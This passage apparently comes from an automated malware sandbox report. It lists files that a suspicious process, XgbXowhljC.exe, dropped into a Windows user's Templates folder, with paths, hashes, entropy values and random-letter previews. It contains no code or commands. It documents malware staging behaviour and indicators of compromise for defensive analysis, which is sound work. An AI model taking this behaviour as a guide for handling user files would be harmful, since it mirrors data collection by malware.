                                                                                      Entropy (8bit):4.699434772658264
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                      MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                      SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                      SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                      SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                      Malicious:false
                                                                                      Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PSAMNLJHZW.docx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:PSA archive data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.698960923923406
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
                                                                                      MD5:186B4E00711974F7AF578BD6FF959BBF
                                                                                      SHA1:642B794D73FB09655FBFF8EDCAAA267634554569
                                                                                      SHA-256:2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
                                                                                      SHA-512:DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
                                                                                      Malicious:false
                                                                                      Preview:PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PWZOQIFCAN.pdf

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.695900624002646
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:55kzf0ILfo2TdftHFyQ9yi5pS2+w9gHtKgqin5q+GzA0Kb08Vb5nY1NLIeukWg/w:56zcILlTxtX9j5TijGzVURS5IBgSGVny
                                                                                      MD5:BC4419B8B9970FEDCD704610C64179B0
                                                                                      SHA1:71BD107584E1CFC5E5E75F765C064FC13228BC96
                                                                                      SHA-256:A2115F382834559DCAB7139CB455FEFBEBBF07B89E2B4B8CFA3DC152491DAC1F
                                                                                      SHA-512:454E3C24F975C0F56F152D24D32C544918CC7663B01CC50C717FAD082B201D4265DA9C5808AFA58573BC104AB739330AEAD49156FA7E7419B3D7CE130EAF3142
                                                                                      Malicious:false
                                                                                      Preview:PWZOQIFCANBQJPWANKEGOVMEWCFFLEMZUVJQOAQAXGCTWZTWYUTVQQWHVDWHRFTNLRYVNIIZGTGOYHBWUXFUJYWYCZRMHOWCZUBHGWNSMDGQIDGAHRDCIIAVORACBTBRHJNIBWQWQCOIRDJVGLMDNVRGTPPKQFQIFZZUCPJOKPUOXSLQIOBEKHODJTILUMNILLOSWDYCRTPWNPHXZSIAIJKAJTPYTYBSZZXRMUJHEQKDIDPVCZFDCTZVNAOYHSQJIJCWEYINXRRNANLPHUEMCLBTQNKFXRNDFJSUGZSSZUNTRNIONZRKWLCPJJQIACLJRBWZWPPPYJBUFAPIIHMQCTYHBSEEDXNTHPLWQREXFJXBUHCFLIGJQMAKBUMLPAYETALQAGUXNUAYOOFWKCXOAFADMANFEKSMOMEUZZFFPVSMHLOYRHXJRRAJALQVRIPUMMCCTGEVBPFLMLHCUGHBKDAURARQMEAWSQWOEBWEPWRBOUUAYHFAMWPSLAHUCSHDTXVLAVOAPCJJOBGMTOASVLNTADXOSSNCBIQVQFWDQSOVWWEBSZHOUAWBRJTVEBGJZEWIEYONXLCRVUQSPXKKPFJIUUWJMLGZBROUKKZUPWGOUIGYNFESGKBBHDAQFXCOZMLVFRUCCOPOYCHAFADUTZZFJYKNDQVJBTYSEVUHBFRNMKFNLBLTGEBDFOSOUEGYXVCXFUPTCVGNVFDGPBRNRCMUVADFIZDQITOTSQQNGGDMNJWJTVAKLEFUUJBLMKOVXJNLWUOGSIVLILHQAZSXDLYYVDPHGSRAAYZOADQUOKQJOANLTVTRHVTUTVJTLAQTNSTQOAIWGJAUNLGKTGFSZYKOTDQQLCHNAGGJECKGDNKFKBCFITQOVNMOIZLXAGNUBDQXAGJBSLDBFKOBLLWCHJAPFBBKFXQCXWXHIIQWQFYRIZJGDPOSSOCUECDWDQBRDSTMSCNGFBWWIQKBSVUPZMODDPXNVVXBEEMTHIHG

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QLSSZNHVJI.pdf

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696310704606104
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:zUNjStS/jdkQzGpfenOSfXauumNY88ePld4qDJvq1iWWa1Jmqg:zptmzGpMOuXauuYY8tXJy1imKD
                                                                                      MD5:F4264A653604CF8A5BF393AA7BE6E818
                                                                                      SHA1:A909364A47943633E37B079FB8F7E71143294011
                                                                                      SHA-256:3D1CC7FE93C905BE207058E112EADA74EB472BCBE5BF855C5F85651DB4E062EE
                                                                                      SHA-512:D848F28195EBA8AFEBD7ECFB40BE28AFC0E36032D4183C7A7B2E2049D4BB8BE9B62F8D2497EEE308C24BD8BADADA4F524A6D983247B9CFAA16748C97C2C14F25
                                                                                      Malicious:false
                                                                                      Preview:QLSSZNHVJIHCDQLMRKBXQDWOBXUVPLESPCUCVSCRFOVLDODMQXNGMEFKHFPHVHAOVOIVUIFZVNBWJCTZFIKECOMAUAEHHTEZDGRQALOSBANKHRDVNZPHAAHUQWNUYTWJKGRHARVPVUVDXBMACOJJKPKBNBGMYDBQWTXLISDXNTKSUJBRCJUFPPAQZYNYMXRZMEYOUQZUAVPUDHUPHGSSNJKMXPRBBHPOEHFNXBMITHLTDNZFYBNUWBSLDELKLRMZRCDXSSKDYDDDTBFIVPGKZJFNGVMTCBWUOJFNBJEASELEZCDVWNXWFZMDSUHAQKWOPMGUNWPSDRMJWMZCKYOJAFEHCKVLEIDNNXGKDQMOPOBRPUNGAMRYNOPAOCULLLMDQXIHJYFOQVYDFCOIHRCBAMXPPKUKMUZYVZWZKFPVPCAQHMMKKTOHFRYIAEAQESEIXOAVHADWVKIITTCFFUOSBVOQZKRGFENXOGCIBLHQYAXGEAQVZPZEIFPJJNVWBFOQNFNLNEGUTOIQZNYAKGHFOOQQOQMKOUBLXVOIEQPAUBMYLNOSLBKKSFNXMTZOZVRDCBAPOSAPIIQJMBTMQUFDWFWHZARXHUCHNXTLZACLUEPFAKHNUZUHNZGQPKKELXYYCNJINQNDFUMDDSWMHIMWQGZUATLFURCGCGNCMERRTICTJCWZQXLWZKHXNIIAUVQJGRYIRIUOQLHQBHJQVUUOOFMVPVNJNMBJUNDHYBCGSJVHUXJYZZQOCIVWQWRZPWIKJVXKYTSZTAYGPSARSBDEEEBUKOLWIKEOAOBOCAHDJYCBUTZHJJWHMDTEPJQDIXYYUABISZJEETHPUIFXMHGOYJPIHVFICTQJQUAGXZCWMVHNJMDNMLHWYJVWLEAHAWMLTGOCDTUECIHEQZXBLOQVNRPIQRHWYMKNKDVSJNNCSNJAMNTUBTHFJROUWUWPMTKCYIWEPLHGIJFDQTMJOVBFVTKEQRNDTRGKGYJLMAVM

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\TQDGENUHWP.docx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696312162983912
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
                                                                                      MD5:83B91EFB8185C5AF5A6B60F4FE9CC2D2
                                                                                      SHA1:0EB7AE1817790DFC5225A02B74A272C84FEE4240
                                                                                      SHA-256:8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
                                                                                      SHA-512:F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
                                                                                      Malicious:false
                                                                                      Preview:TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\VWDFPKGDUF.xlsx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696835919052288
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                      MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                      SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                      SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                      SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                      Malicious:false
                                                                                      Preview:VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WKXEWIOTXI.docx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697336881644685
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                      MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                      SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                      SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                      SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                      Malicious:false
                                                                                      Preview:WKXEWIOTXIKPVKMTOJVZKCCJOJQJVVBUCRVSCWBTZFRFCLMJEFYWDAADXDSWAVKQUKEQVBGBEVVYQQKRCSDIQBFHQPNUHXEGBVBQAZXUXMBFNLNCNTBFAMVYZJITBIGADWSFAFETGWVSLSMWHTRSSUNGFAPUBMTUYBFNDIWUKESLBWQSCOTLFFHGDQBTCYHJBCBOARQTWMUDRIUXIXOCLDIEADCRMXGAMQGVIRNLAGTALJHBZWRNXXRRBLYDOAYCBGEJCTGYVJXPIAIVUAKQQBRSXZKMFBMWWCHMTGNMNRBVSOTUFWOEJRLHHVPMJECGASFUTKIEPJVDDGJBEAOSKQSOAKQFVDMPVFZXVQQGBIVNAKYSEGLMWLAYDYTALUJSLPWCLEJKQBXBYHAKPFMJEIYHGDOFGQSDOCEQICJNJHPIMYZXEEBLQDGZQJHXKMNXDWJCMMFBONBYYWLDOKPYOROQOAOXKLNFZNGOBDFJUKRZTHKLRBINVCYAUIXORJECNOHLVMBHPPCTEWZMHAKKOWVWNWGYCHRMUWRNDXFYYWTIGTCJKQDPGUNHAJQDLUZMXHCGTFUQBMGYHZZQTDVDXANXWNWKFTJJGQDHQOXVXPQVSIEKEEJXYUACENKWKIJBJQXHMLMPZXYAVPNORKZSDXAKFPVLVKXAALPKPLPVFPCSRBEEJDNJCIJXXOCNXCBVGHIYCQQVQHTTNURHGTJJXKJRPJEGOUFOHMMCJGVNMXOAXZBVGWVBLQZNFUTGTNMFHQOEJPQLIMHIWPQHWMJJDCVVMWJEEFQQZJEEECMHCCUANTBJYRWUCSJSOHYMSBWTKOKBZPVNMIVCLDDALCEUFSLAOCOCSAXADDYPCSIANHKQFGMSMYTDVKAOIYTWPDDCRKDNZYGXHYDSDFXTLUDKREZTPVBCYOHCUNIFNCKBSSGTENGDYROMJUTSSFWEEFXLJPBMSINKXZCEUWQMDWGNHDWNFHYTECVIYIAPNGWL

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WKXEWIOTXI.pdf

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697336881644685
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                      MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                      SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                      SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                      SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                      Malicious:false
                                                                                      Preview:WKXEWIOTXIKPVKMTOJVZKCCJOJQJVVBUCRVSCWBTZFRFCLMJEFYWDAADXDSWAVKQUKEQVBGBEVVYQQKRCSDIQBFHQPNUHXEGBVBQAZXUXMBFNLNCNTBFAMVYZJITBIGADWSFAFETGWVSLSMWHTRSSUNGFAPUBMTUYBFNDIWUKESLBWQSCOTLFFHGDQBTCYHJBCBOARQTWMUDRIUXIXOCLDIEADCRMXGAMQGVIRNLAGTALJHBZWRNXXRRBLYDOAYCBGEJCTGYVJXPIAIVUAKQQBRSXZKMFBMWWCHMTGNMNRBVSOTUFWOEJRLHHVPMJECGASFUTKIEPJVDDGJBEAOSKQSOAKQFVDMPVFZXVQQGBIVNAKYSEGLMWLAYDYTALUJSLPWCLEJKQBXBYHAKPFMJEIYHGDOFGQSDOCEQICJNJHPIMYZXEEBLQDGZQJHXKMNXDWJCMMFBONBYYWLDOKPYOROQOAOXKLNFZNGOBDFJUKRZTHKLRBINVCYAUIXORJECNOHLVMBHPPCTEWZMHAKKOWVWNWGYCHRMUWRNDXFYYWTIGTCJKQDPGUNHAJQDLUZMXHCGTFUQBMGYHZZQTDVDXANXWNWKFTJJGQDHQOXVXPQVSIEKEEJXYUACENKWKIJBJQXHMLMPZXYAVPNORKZSDXAKFPVLVKXAALPKPLPVFPCSRBEEJDNJCIJXXOCNXCBVGHIYCQQVQHTTNURHGTJJXKJRPJEGOUFOHMMCJGVNMXOAXZBVGWVBLQZNFUTGTNMFHQOEJPQLIMHIWPQHWMJJDCVVMWJEEFQQZJEEECMHCCUANTBJYRWUCSJSOHYMSBWTKOKBZPVNMIVCLDDALCEUFSLAOCOCSAXADDYPCSIANHKQFGMSMYTDVKAOIYTWPDDCRKDNZYGXHYDSDFXTLUDKREZTPVBCYOHCUNIFNCKBSSGTENGDYROMJUTSSFWEEFXLJPBMSINKXZCEUWQMDWGNHDWNFHYTECVIYIAPNGWL

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WUTJSCBCFX.xlsx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.688284131239007
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                      MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                      SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                      SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                      SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                      Malicious:false
                                                                                      Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\XZXHAVGRAG.docx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.69156792375111
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                      MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                      SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                      SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                      SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                      Malicious:false
                                                                                      Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\XZXHAVGRAG.xlsx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
